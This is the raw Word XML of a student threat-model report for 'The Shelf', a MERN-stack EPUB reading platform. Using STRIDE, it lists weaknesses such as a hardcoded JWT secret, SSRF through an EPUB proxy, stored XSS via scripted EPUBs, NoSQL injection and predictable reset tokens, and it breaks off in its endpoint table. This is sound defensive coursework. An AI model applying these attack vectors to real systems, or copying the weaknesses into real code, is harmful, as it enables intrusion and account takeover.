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0FF2F">
      <w:pPr>
        <w:spacing w:before="3000"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24E25B17">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A5276"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
        <w:t>THE SHELF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D3FE9E0">
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="2980B9"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Threat Model &amp; Attack Surface Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20EBDB3C">
      <w:pPr>
        <w:spacing w:after="600"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="7F8C8D"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>MERN-Stack EPUB Reading Platform</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55CAB750">
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Course: Cybersecurity </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="638A8967">
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Habib University DSSE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E078443">
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:cs="Arial"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Jotesh Kumar, Taha Hunaid, Qasim Shakir</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F2320E1"/>
    <w:p w14:paraId="1B693DC6">
      <w:pPr>
        <w:sectPr>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="708" w:footer="708" w:gutter="0"/>
          <w:cols w:space="720" w:num="1"/>
          <w:docGrid w:linePitch="360" w:charSpace="0"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4260AF71">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="360" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>1. Executive Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="017840FA">
      <w:pPr>
        <w:spacing w:before="0" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The Shelf is a web-based EPUB reading platform built on the MERN stack (MongoDB, Express.js, React, Node.js). This document provides a formal threat model and attack surface analysis using the STRIDE methodology, identifying 12 distinct threats across the application's three-tier architecture.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79C2FA26">
      <w:pPr>
        <w:spacing w:before="0" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Key findings include 3 Critical-severity threats (hardcoded JWT secret, SSRF via EPUB proxy, and stored XSS through malicious EPUB uploads), 4 High-severity threats (NoSQL injection, mass assignment, weak PRNG for reset tokens, and JWT theft via localStorage), and 5 Medium/Low-severity threats covering denial of service, missing audit logs, and data integrity issues.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D1DFE24">
      <w:pPr>
        <w:spacing w:before="0" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The threat model is structured to directly inform the exploitation phase (Week 3) and remediation plan (Week 4) of the DevSecOps project lifecycle.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278818FB">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C3E532C">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="360" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>2. Application Architecture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18EFA720">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>2.1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5F2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316DD417">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Layer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="65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81F41C2">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Technology</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="0CD5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D2D6E7">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Frontend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03BDEB">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>React 18 + TypeScript + Vite + TailwindCSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="2A7F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101775">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Backend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DDCBD">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Node.js + Express.js (single server.ts monolith, 892 lines)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="562B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B18882">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Database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0AE8D1">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>MongoDB (Mongoose ODM) — collections: users, books, readingprogresses</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="486F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298611">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Authentication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F3F8AB">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>JWT (jsonwebtoken) stored in browser localStorage</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="0C74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DF0B5D">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>File Storage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6209FF">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Local filesystem via Multer — /storage/epub/, /storage/covers/</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="6920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D18FCB">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>External API</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02776F">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Gutenberg API (gutendex.com) for book metadata and EPUB URLs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="78CD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E6C917">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Deployment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5956AA">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Docker (docker-compose: app + MongoDB 7 + self-signed HTTPS)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="21122E07">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>2.2 Data Flow Diagram (DFD) with Trust Boundaries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5125733F">
      <w:pPr>
        <w:spacing w:before="0" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The following DFD identifies three trust zones: the Untrusted Zone (browser clients, external APIs), the Application Zone (Express.js server), and the Data Zone (MongoDB, filesystem, localStorage). Trust boundaries are drawn at each zone transition.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CACFBB0">
      <w:pPr>
        <w:spacing w:before="200" w:after="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5621020" cy="393509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621020" cy="3935095"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="23687BD9">
      <w:pPr>
        <w:spacing w:before="0" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="7F8C8D"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Figure 1: Data Flow Diagram showing actors, processes, data stores, and attack vectors across trust boundaries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FD3DB24">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>2.3 Key Architectural Decisions with Security Implications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2EC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65449AD5">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Decision</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="58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072FFC87">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Security Implication</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="58B9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7ED757">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>JWT stored in localStorage</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417CA">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Exposed to XSS; not protected by HttpOnly cookie flag. Any script execution in the SPA context can exfiltrate the token.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="31EC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3A0B4B">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>EPUB proxy fetches arbitrary URLs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CE8DF3">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Server-Side Request Forgery (SSRF) risk. No allowlist of permitted proxy targets. Internal network resources accessible.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="25F2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3533BC">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>allowScriptedContent: true in epub.js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7A7C8">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>JavaScript inside EPUB iframes executes in the browser context. Malicious EPUBs become a stored XSS delivery mechanism.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="2BA7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94F84A">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Multer validates MIME type, not magic bytes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6AC9D9">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Polyglot files (valid ZIP + malicious payload) bypass the filter. File extension check is trivially spoofable.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="2EC7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2FEA44">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CSP set to unsafe-inline + unsafe-eval + *</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35083">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Content Security Policy is effectively non-functional. Provides zero protection against XSS.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="3DBB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51B8D7">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Math.random() for reset tokens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D33985">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>PRNG is not cryptographically secure. Token values are predictable given seed observation.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="29D6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BAED1">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>JWT_SECRET defaults to hardcoded string</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B65233">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>If .env.local is absent, all JWTs become forgeable with the publicly known secret.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="46A08A18">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D160F5F">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="360" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>3. Attack Surface Definition</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="196F31DB">
      <w:pPr>
        <w:spacing w:before="0" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The attack surface is mapped per application component, identifying every entry point where external input crosses a trust boundary.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22BE3761">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>3.1 API Endpoints (Express.js)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9"/>
        <w:gridCol w:w="951"/>
        <w:gridCol w:w="1335"/>
        <w:gridCol w:w="1167"/>
        <w:gridCol w:w="3338"/>
      </w:tblGrid>
      <w:tr w14:paraId="658B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43FA4E21">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Endpoint</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="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2A425F2E">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Method</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A0C026C">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Auth</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154C4095">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Risk Level</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="35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0C367857">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Attack Vector</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="6388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7944D">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/api/auth/signup</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1DB46D">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E65EC">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95D5CE4">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="F39C1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7904A8">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>User enumeration via MongoDB E11000 duplicate key error messages</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="5FC2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528C33">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/api/auth/login</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1DD2BC">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5D3528">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43E0AD7">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="E67E22"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>High</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EEF300">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>NoSQL injection on email field; brute force (lockout exists but bypassable)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="7452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01040C">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/api/auth/forgot-password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2AB3ED">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7C0E67">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6F3E647F">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="E67E22"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>High</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226EB3">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Reset token generated with Math.random() (predictable PRNG, not CSPRNG)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="34AE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E4B75E">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/api/auth/reset-password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ACF42B">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C25A45">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6E40E4B4">
            <w:pPr>
